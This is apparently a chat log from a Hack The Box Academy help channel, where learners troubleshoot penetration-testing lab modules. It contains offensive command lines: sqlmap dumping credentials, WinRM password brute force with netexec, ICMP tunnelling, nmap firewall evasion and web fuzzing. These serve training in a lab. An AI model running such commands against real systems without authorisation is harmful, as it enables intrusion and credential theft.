I did, somehow my VPN was switched to a different region
Ok
That’s a you problem. We can’t help you with this.
This channel is for help with academy learning modules https://academy.hackthebox.com
I'm not asking anything, I'm just stating bruhh
That’s okay. This is for academy help only. Other than that, we can not help.
Maybe he's rude because he doesn't want to teach you the basics or you're too impatient to learn the basics
I'm damn impatient!! You're right
Academy is a great place to learn the basics in a controlled environment
And he told me to first complete the CompTIA+, OS+, Network+ and Security+ courses, but I didn't 😅. I'm dumb as Luffy!!
Maybe I will try in the future
Hey, @storm elk
Have you done the Whitebox Attacks module?
Can’t seem to find the right payload on the client side prototype pollution section
can someone give me a slightly better explanation of braa <community string>@<IP>:.1.3.6.*? If I'm not mistaken, the .1.3.6.* part is the OID, but how is this chosen in the module for me to enumerate against? Is 1.3.6.* randomly chosen?
I have finished the path, I can look at my notes tomorrow 🙂 feel free to dm me a reminder
Hey guys when submitting answers, in hack the box, do they have to be exact? To move on ? (I’m very new, and I’m pretty sure I have the answer but not the format )
Sure! Will do! Thanks
Yes
I believe so. Make sure there’s no leading/trailing spaces
Yeah, I usually have to delete some space behind the flag
I have a question. How are we supposed to access the strong password for the decryption key of our operating system if the password manager is inside the operating system?
Wym? What module
I’m just trying to answer “What does the acronym for Linux PAM stand for?” and I’m putting “Pluggable Authentication Modules” and it’s not working?
It's part of the Setting Up module, when it talks about strong passwords and reusability. Later on it teaches how to install Linux on a VM with encryption and advises us to use a strong password for the decryption key. But how can you access it if the password manager you're using on the web is inside the OS? Do you need to use your phone to access the password manager every time?
that is definitely the answer but you are probably messing up spaces
probably a whitespace that you don't see
Hey guys,
Does anyone know of a free alternative tool to a reverse image search like pimeyes?
Thanks 😭 I just got it I was stuck for 30min
no worries
I don’t think you use a password manager for the decryption key
U have to remember that
You generally wouldn't store the os password on the os you're needing it for
Google can search for images too
Like locking your keys in the car
Yeah, I’m looking for one that correlates specifically faces. Thanks though!
Does anyone have comptia certs?
Might be worth asking in #careers-and-certs
I guess you're right. Thank you.
In the same vein, you don't have to set up encryption on your vm
What about on a physical machine, then?
Only if you're paranoid
Physical machine it is then.
I just don't want someone close to me in the real world finding out my user password and looking on my laptop while I'm not there. They'd have to know the encryption key too.
tineye, google lense
trying to do the nessus skills assessment but I can't seem to get nessus to launch. I'm putting 'https://localhost:8834' into the firefox browser of the pwnbox and just can't get a connection
I am finishing the pivoting module but I keep having the same problem again. I struggle when performing host discovery in an internal network doing dynamic SSH port forwarding. Particularly when trying to detect windows targets which have ICMP disabled. Any idea how to speed up the host discovery?? By using another technique or smth...
it won't be on the pwnbox
it'll be on the spawned target https://targetIP:8834/
nessus isn't installed on the pwnbox afaik
tried the targetIP as well from the browser in the pwnbox and same thing happened
I'm assuming the VM in the nessus skills assessment mentioned here is the pwnbox
it is not
the target VM is the one that's spawned with "Click here to spawn target"
aaah okay, once i spawn the target what do i do with the IP?
trying to connect to that targetIP:8834 still gives the same result
just visit it in the browser
yes that's what I'm doing. getting a connection error
can you share a screenshot?
i think something is wrong with my internet cause I tried to restart the machine and I've been stuck on this screen for 10 minutes
Hello,
Apologies if this is a dumb question/issue, I would appreciate any help or support.
I'm encountering an issue with ICMP Tunneling with SOCKS in the Pivoting, Tunneling, and Port Forwarding module
When running:
sudo ./ptunnel-ng/src/ptunnel-ng -r10.129.37.87 -R22
I get this error:
./ptunnel-ng/src/ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory
This happens on the Ubuntu pivot host (10.129.37.87), which doesn't have internet access.
Here’s what I did:
- Cloned the repository:
git clone https://github.com/utoni/ptunnel-ng.git
- Navigated to the directory:
cd ptunnel-ng/
- Ran the autogen script:
./autogen.sh
- Transferred the directory to the pivot host using SCP:
scp -r ptunnel-ng ubuntu@10.129.37.87:~/
Should these dependencies be statically linked before transferring ptunnel-ng? Or should it be rebuilt with the dependencies on the pivot host? Could this be an issue with the pivot host itself? Any help or clarifications would be appreciated.
in wireshark when i try to filter by mac address the syntax is hw_mac or hw.mac?
try to refresh the page of htb
hey does anyone test malware and ransomware for fun or is it just me?
guys I have been stuck at a section for like an hour now and only found out what to do by researching for an answer online and I really want to know if I did anything wrong or misunderstood something
anybody has a few minutes to spare?
I didn't get the robots.txt as a result even though robots is in the namelist
Hey all I am pretty new to pentesting / HTB I'm almost done with the NMAP module in academy and some walkthroughs in Labs.
I am a web programmer by trade that has been working on his own Cryptographic Libraries for about 1.5 years in C#/Rust through an FFI layer, I didn't write the algos myself but I constructed a usable library in most cases. I've worked on my own authentication systems quite a bit because I find security interesting. What module in academy is worth purchasing for someone like me? I also have some Active Directory experience from years ago as an Admin. I still wanna get my lab up and running for some YouTube videos there.
I don't have enough cubes at the moment so I would have to buy which is fine.
You should probably start with the free tier0 stuff
how much HTB credits you have?
I have 16 cubes, I just picked up "Setting Up" for 10.
Do u guyz like kali or has anyone used black arch before
And please, you can ask these questions in #general , this channel is only for questions related to problems in modules.
I have an arch install with hyprdots config, and I started reading some books. Got some different distros. Just curious since Kali is Debian based, and arch uses pacman
Ah they told me to ask here. My bad 😆
I don’t have access to general chat atm so this is kinda the only place to ask questions
lol
just use kali or parrot bro
The Tier 0 are effectively free, start doing those
To find .txt you probably need to specify an extension with -x
Htb has parrot as a workstation
Well then, I'm not sure where you should ask, but regarding the price of the modules I recommend doing all the tier 0 ones and then moving on to the next ones, since the higher the difficulty, the higher the price.
I’ve looked through the tools and they have a lot however Kali is probably tested and updated more regularly
Parrot and Kali are both Debian based, either is fine. I wouldn't do BlackArch unless you wanna really customize your life and convert tools
I am missing something then because I didn't see a bunch of free ones that last time I looked but that was months ago. Thanks I'll take another deeper look and see what is out there.
They cost 10 cubes and give 10 cubes
Appreciate you
Thanks!
i was doing the same ur doing but i ended up just getting a kali vm on arch
Nice
I like hyprland and the hyprdot look and feel but I use both as a vm. Arch and kali
hm? How do you think it should be instead of
gobuster dir --url http://94.237.59.199:56159/ -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt
I used the same line from the section and it didn't have it in there
I would send a video but don’t have access to posting photos or videos atm
No, search the docs for "extension". -x
I'm mobile now so can't help further, but I'll check back in when I'm at my desk.
what module
Getting Started; Section Web Enumeration
ur looking for robots.txt?
i found it in 20 seconds
that wordlist u choose is really big and doesnt have robots.txt
/usr/share/wordlists/dirb/common.txt is the first wordlist i always try
Ok, I'm sitting down and gave it a shot. Your wordlist will work (but it is huge), but you need to use the -x argument to specify an extension. It will find both the wordpress directory and robots.txt.
I guess you can use a wordlist that contains both directories and files, but using the extension argument seems more flexible.
You good?
eh. I tended to experiment with wordlists through those modules instead of exactly what was in the reading myself.
My pc Internet just went out so got on my phone
I actually cant find the one you are using
so if I just add -x at the end it should work out?
yes but that would double the amount of words and take much longer
Yeah I will try it in a second when my internet goes back up in a second
it's just that it is 1am already and I won't be able to sleep if I don't know how to make it work lol
Error: flag needs an argument: 'x' in -x
okay so the -x didn't work, and the common.txt file from the site just doesn't exist at that location, and I found another in /usr/share/seclists/Discovery/Web-Content/common.txt .
And now I also got the exact result I found in the YT Videos and the guide on the page
Just for reference, the path doesn't lead to the file
Yeah you will have to use the “locate” command to find stuff depending on the distro
I had issues with getting gobuster to get the extension
Worked fine with ffuf
Literally the similar syntax just replacing x with e
Also -x requires at least one extension
Yeah, and ffuf is super fast
Which is why it yelled at you
yeah I used locate at the end, but kind of disappointed, because I used the pwnbox and the location in their guide should be the same on their own distro and machines that they are using but idk
I guess it changed over time and it didn't get updated maybe? just confused
It's due to the recent pwnbox changes
Literally within the last month or two
Ahh okay I have been on a wild goose chase for the last like 1 1/2 hours to find that one file
And from what I hear, it's a major PITA to update the guides
or thought I had an error in the line or smth
The seclist common.txt is the same thing
With a handful more lines
Source: I've run a diff on them
👍
They're likely working on updating guides and such and gonna push a mass update to them
As I've been told, updating them individually is a PITA
Like, as a question from my side, how do you just remember all these lines and commands and tools when at some point doing actual practice on machines?
I am so overwhelmed rn with all the tools I am getting thrown at
do it for a year or two
you'll remember most of them
besides that just take notes and use Google
Command kinda nice
also remember -h and man are your friends
Never seen that
Literally just repetition
And notes
diff has many options to make things super nice
If you're unsure why 2 files that should be the same, aren't
One of the random things that I saw happen was downloading something from the site via a download button resulted in a file with CRLF characters [common for windows] instead of new line [for other OS], so it wasn't working properly
diff showed every line was different, even though they appeared the same
Is there a maximum duration for Password attack modules recommended?
Generally if you don't get the password within 30 minutes you're doing something wrong
ok
There's some bits that are somewhat intentionally a bit longer
But it's slightly more realistic
Not everything is gonna be instant
I mean sure but I also have to manage my time
that and when I have a server with 8 a100s in it, it does be going fast
oh okay you have to download shit from the website for your list
If there's a resources button there's a non-zero chance it's needed
Are they per section or per whole module?
They should put the button here
htb is free to use this in their design documentations
Per whole module
And the download is usually near the top
ew even worse
Also idk how you got to that point, iirc you needed to create a mutated wordlist prior to that section
it's def shorter than the seclist usernames and rockyou
Most wordlists are shorter than rockyou
You should basically never use rockyou for bruteforcing
hi
yo
i only use rockyou2024 for bruteforcing 
i use rockyou for fuzzing ☠️
God your fuzzing must take ages
How do u get access to type in general
hey were you able to figure this out? i'm wanting to practice that method as well
@wary tendon ; did you log out and back in?
also many people do AEN blind as the module itself is the walkthrough
so it's a bit more taboo to ask about that module
with windows whenever you make changes to a user you are logged in as, the changes don't take place until the next user log on
I've been trying but it's difficult. Do you mean log out of RDP and back in again?
No I have not🥲
I guess for the changes to take effect
I shall see thanks ill give it a shot tomorrow
Even signing in though from the same session after adding to group didn't work
I mean running cmd and ps as admin
Would changes not take effect automatically
once relogged, yes
I am stuck on the question, any suggestion?
Windows dislikes making changes to objects that are in use
are you using the password list from resources?
well signing out and back in is re-logging
yeah
and the username list?
yup
syntax?
crackmapexec winrm <target_ip> -u username.list -p password.list
what am i missing?
are you getting errors or are you just not getting the answer
just ran it on my machine (with netexec) and it worked just fine
it works fine but not getting answer
i got the answer just fine for me
¯\_(ツ)_/¯
md5sum username.list password.list
75cc560d46286d74e73b85b2a5183e63 username.list
c75d6ec1311119028b89edaca8240603 password.list
in my case it (the brute force) goes on and on
it will take a few minutes
don't expect much instant gratification from this module
this is definitely a module that tests patience
I ran it for 30 minutes and the list brute-force does not finish
it definitely shouldn't take 30 minutes
try respawning your target
also just as a sanity check can you verify your username.list and password.list md5sum matches mine?
let me check
75cc560d46286d74e73b85b2a5183e63 username.list
c75d6ec1311119028b89edaca8240603 password.list
it is same
what is the use of "custom.rule"?
let me try again with netexec
Note; during this conversation I ran it twice and got the expected login info
are you using 'crackmapexec' or 'netexec' tool?
netexec
netexec is crackmapexec
it's literally the same devs that were maintaining the cme tool, and then a dispute happened and now we have netexec
cme has been archived for a while at this point
wow
these lists contain 102 users and 204 passwords, so how are you getting the answer in two minutes!!
The user and password aren't at the bottom of these lists
Netexec rotates through usernames first
So it'll try the first password against all users, then second...
Why when trying to resolve some domain names it returns something like 192.168.0.1.in-addr.arpa that part after the IP?
Any one completed "ADVANCED XSS AND CSRF EXPLOITATION" section "XSS Filter Bypasses"?
Been stuck for days, I managed to bypass using an <iframe> payload but can't trigger the admin page
skill issue
what does that mean
Is it only mine or do you guys also experience an issue when opening HTB academy inside the pwnbox browser to download a file, let’s say nix.zip?? It weirds out by flickering the screen and constantly changing the size of the pwnbox inside the browser, making it difficult to navigate
that may be because you have it opened in a new window (full screen); if so, it's trying to keep up with the window on the module page and the full screen on the other tab
Is there a solution to it?
cope, like i do 😛
Hahaha…Tried doing that for like 15 mins or so but frustrated now since I wasn’t able to download a single attached file to complete the task at hand 🥲
Does anyone know the problem with the Windows Fundamental Module? I can't connect to the target through RDP, I can't ping it, even the Pwnbox can't connect. But other modules are working fine.
You can DM me
oh right you have the download issue
ok so min/max the window or just drag to resize it should stop wigging out, for a bit
also if you have two monitors put the module in a new window on the other screen, may help a bit
why this not working: ip.addr matches ".237$"
contain
Hello, I am trying to solve the GET parameter fuzzing assessment from the Attacking Web Applications with Ffuf module of CBBH. For fuzzing the parameter, first I tried to fuzz the directory; I could not get anything useful from the main domain, so I tried to fuzz on the VHost. But the VHost is not reachable and I couldn't fuzz its directory. If someone is familiar with this one, can you tell me where I went wrong?
sudo nano /etc/hosts add a line with your_target_ip admin.academy.htb
every virtual host needs to be added to your local DNS resolution because the domain name of the target in this case is not publicly registered
I added the main domain on /etc/hosts and thought that would work. Alright, let me try
show host file and nmap output please
oops nvm i thought this was a box
double check host file
Definitely the lack of the admin.academy.htb in the hosts file
hey guys, just starting out on HTB academy right now as a super beginner and was wondering if i should start the "Cracking Into HTB" skill path or the "Info Sec Fundamentals" skill path first.
I have already completed the following:
Intro to HTB
Setting Up
Learning Process
any tips on where to go now?
complete the Information Security Foundations skill path
aight thx
Module - Footprinting, Section - DNS, The final question in the DNS lab asks you to find the hostname of an IP that ends in 203. I tried brute-forcing subdomains, but I was unable to find it. When I looked at the answer, it tells the student to brute-force dev.inlanefreight.htb. Does this mean that you have to try to brute-force every subdomain you have learned from the zone transfer, because all I was trying to brute-force was inlanefreight.htb?
yes
Alright!
You can do it recursively but remember to add the addresses you are going to try to /etc/hosts
map each subdomain with the target ip for local dns resolution
How do you perform it recursively?
Anyone can give a nudge on the "Whitebox Attacks" Module - Section Client-Side Prototype Pollution?
I got the local XSS payload, but when sending it to the admin it does not work and no callback is returned
why "Hypertext Transfer Protocol" is HTTP AND NOT HTP
Hi, I'm kinda confused, why do we need to map let's say dev.inlanefreight.htb to an IP in order to brute force? Because with dnsenum, for each subdomain in the wordlist, we query the DNS server to check if the hostname exists for dev.inlanefreight.htb, so what's the point of mapping dev.inlanefreight to an IP for local resolution?
Hello Guys, here to bump this message from a year ago, this still hasn't been solved, it doesn't prevent you from doing the challenge but I think it should be patched
What's going on ? :
the command curl -i -X OPTIONS http://SERVER_IP:PORT/ returns the webpages (including its flag in the body's response tho) but doesn't contain the Allow: header
What's expected ? :
[!bash!]$ curl -i -X OPTIONS http://SERVER_IP:PORT/
HTTP/1.1 200 OK
Date:
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: httpd/unix-directory
because it is not the public internet and the domain is not mapped to any public DNS server
do I need to worry about overwhelming the target systems in modules?
as long as you are not performing dos and ddos attacks, it's fine
alright
now i’m kinda curious what would happen if someone did. would it just shut off the system or would it do more damage?
would make the system unstable for attacking. dos and ddos are basically cutting someone's power off - but as a learner, it won't do you any good. so don't try it. it's mentioned in the hackthebox guidelines.
I wouldn’t, dw
cool
So is there a more precise term for "password spraying" but using hashes instead?
"Hash spray" I guess. Seems like some people use the phrase.
how can i make sqlmap faster?
time-based SQLi just takes an hour to dump 1 row even with knowledge of the DB type, DB name and table name
this is my current config
sqlmap -r request.req --batch -T users -C username,password -D htbdb --dump --level=3 --risk=3 --threads=10 --skip=dbs,hostname --technique=T
try the ghauri tool, most of the time it works faster than sqlmap
how to do please
Please state the module and section where you're having trouble. Tell us what you've tried.
Hunting Evil with Sigma (Chainsaw Edition)
i tried many chainsaw commands but it doesn't work
could you help with this? @storm elk
send me a dm with all you've done
that moment sucks 😄
Did you manage to solve your second question ?
What?
Hi, I'm doing the SOC path in HackTheBox Academy and I have a question.
Windows Event Logs
Windows Event Logging Basics
Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: TW__.exe
I don't even know how to start doing it...i have problem with it:
Practical Exercises
Navigate to the bottom of this section and click on Click here to spawn the target system!
Now, RDP to [Target IP] using the provided credentials, open Windows Event Viewer, and answer the questions below.
How to connect RDP with target IP? Should i do it from Pwnbox on site or should i download something to my VMbox or can i do it on my Windows PC?
Either pwnbox or your vm
I use xfreerdp, but you can also use remmina
Should i download it on Parrot OS and will i be able to connect to the target IP after?
Ok, thank you
Soz wrong server...
The T option in technique stands for time-based injections. So it is increasing time delays between the sql server and you, so this can take a while because sqlmap is using cpu intensive functions like sleep() and benchmark to extract data from the database.
i mean yeah i used T cuz i know that it is the technique that can work against this parameter
i know that time based sqli takes long time to be done
but man this is just toasting the server
Hey guys! Anyone encountered this issue on the module Windows Event Logs & Finding Evil - Tapping Into ETW: After I started capturing ETW events I created the cmd command process from spoolsv.exe but I cannot find any process id info in the etw.json file. No log info about this spoolsv.exe.
Guys, I'm currently working through Firewall and IDS/IPS Evasion - Hard Lab in the Network Enumeration with Nmap module and having some difficulty getting the flag...
So far I've tried the following against ports ||TCP 21, 139, 445
- SYN scan -sS
- ACK scan -sA
- Decoy scan -D RND:5
- Specifying a different source IP address (couldn't get this to work)||
Can anyone offer any advice?
An example of my latest scan: ||sudo nmap 10.129.xx.xx -p 139,445 -Pn -n --disable-arp-ping -sS -sV --reason --source-port 53|| - just results in ports showing as filtered 🤷♂️
I am currently doing the skills assessment on HTB Academy running gobuster and have my vhosts added to the /etc/hosts but I am not finding any directories at all. Anyone have any guidance?
This is the Info Gathering - Web Edition module
because the only thing you have is the destination IP. that subdomain is actually a virtual host, so the reason you map that subdomain to the IP address is to know where to direct the request. in this case your browser automatically changes the http header, creating an entry where Host: domain_you_type, and the server in the backend will return one response or another based on that header
try finding the directories for each subdomain you find also
I haven't found any subdomains at all yet
then do it
refresh your HTB academy page and make sure your target machine is still active and the IP address is still the same...sometimes it will show that the target machine is still active and has minutes left but it's actually expired or terminated for no reason...i
gobuster vhost -u http://targetsite.com:PORT -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
?? don't confuse him please
this is not working ?
no sir
and in my /etc/hosts file I have the target IP as well as the target vhost
When you run it do you get any error?
No errors
could you send a screenshot?
sec
I'm not. I had the same exact problem, I was running a fuzzing scan on a terminated instance and wasn't getting any results...until I refreshed the HTB academy module page and saw that the target IP address is not showing any more and had to request a new one
And it worked right after
@twin bridge I appreciate it but that is not what is happening in my instance
Don't scan specific ports
🫡
You won't be able to send a screenshot here btw
What contents are you wanting me to send in regards to the SS? The scan running?
Your account needs to be linked to send images
@fathom pendant is now here, he will help you better than me
Is there anyone who could help me with the WEB Requests POST Lab?
what you need help with?
You were doing fine
I'm at the section where you do a search for a city, and we're supposed to observe a request to search.php but I can't get that far because of a CORS error message.
Yeah I am running ffuf and no dice either @plucky hollow
let me see the command you used
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://inlanefreight.htb:PORT/FUZZ
You literally put PORT or changed it to the port?
Https
Use http instead
and you need :FUZZ after the wordlist
Also as tom said, you use the spawned port. Very rarely will the targets be running TLS
No you don't
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u https://inlanefreight.htb:PORT/FUZZ to assign the value of the FUZZ variable?
You do not
Aight, I did that on gobuster but it didn't work. I will try it on ffuf, appreciate yalls help 🙂
It's implied
Put the number of the port where you say PORT
Yeah I did
oh ok i didn't know that
The only time you specify is if using multiple wordlists
And you’re fuzzing directories now, not subdomains
ye he is using a wordlist of subdomains in directories
…
His original message was subdomain fuzzing
.
Didn't realize he switched to directory fuzzing somewhere in the middle
All good
Anyway Tom's got a handle on this I'm gonna go get me an Irish Creme Monster Java
is there a clipboard for HTB academy pwnbox? I only see "hide all windows" shortcut there at the place of the usual clipboard
I can copy into and from the pwnbox just fine
Bottom right, full-screen
Aside from that, ctrl+shift+v can paste just fine
ty
Quick question, for the attacking common services module attacking sql databases. For the questions are we supposed to use sqlcmd like they did in the explanation? I don't seem to have that in my repository. Would it be simpler to just use an instance?
You can use sqlcmd, mssqlclient, sqsh
Iirc the section details like several different connection tools
hello I have problem regarding module 'Active Directory Enumeration & Attacks' - 'Bleeding Edge Vulnerabilities' section
It's about second exploit- PrintNightmare
For some reason "The system cannot find the file specified": I can't transfer my payload as part of the cve to my target. I think the issue lies within the python version but I'm not sure, on first look the specified paths look the same
eventually there's a problem with escaping "\b" character?
Can you send the payload by creating a server with python and downloading it from the target system?
¯\_(ツ)_/¯
I don't think so
@autumn void but have you followed the steps correctly
Yes I’ve tried everything
I had no problem with this module, did you launch silkview, do the spoof and exit silkview?
In case, try to find the event in event view
With the correct EventID and Pid as the course explains
Maybe I am not launching it properly… How did you launch and exit the silkview?
